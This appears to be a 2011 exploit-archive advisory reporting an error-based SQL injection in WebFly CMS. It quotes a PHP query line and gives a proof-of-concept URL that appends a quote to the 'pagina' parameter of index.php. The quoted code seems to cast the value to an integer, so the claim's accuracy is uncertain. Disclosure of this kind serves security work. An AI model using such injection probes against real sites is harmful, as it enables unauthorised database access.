WebFly CMS suffers from a remote SQL injection vulnerability.
d3ede83184b80b2fe65b6978cce8eeac4aa4fb33be3ad77535f461e0d84d5492
[$] Exploit Title : WebFly CMS Error Based SQL Injection Vulnerability
[$] Versions Affected : ALL
[$] Date : 21-03-2011
[$] Author : MasterGipy
[$] Email : mastergipy [at] gmail.com
[$] Bug : Error Based SQL Injection Vulnerability
[$] Google Dork : [None]
[$] Vulnerable code in /web/inc/paginas/inc.paginas.top.php
$query_DetalhesPagina = sprintf("SELECT * FROM paginas WHERE ID = %s and Activo = 'Y'", GetSQLValueString($colname_DetalhesPagina, "int"));
[$] Exploit
[+] http://[site]/index.php?pagina=1 <- [ERROR BASED SQL INJECTION]
[+] e.g.
http://example.pt/index.php?pagina=2'
[$] Greetings from PORTUGAL ^^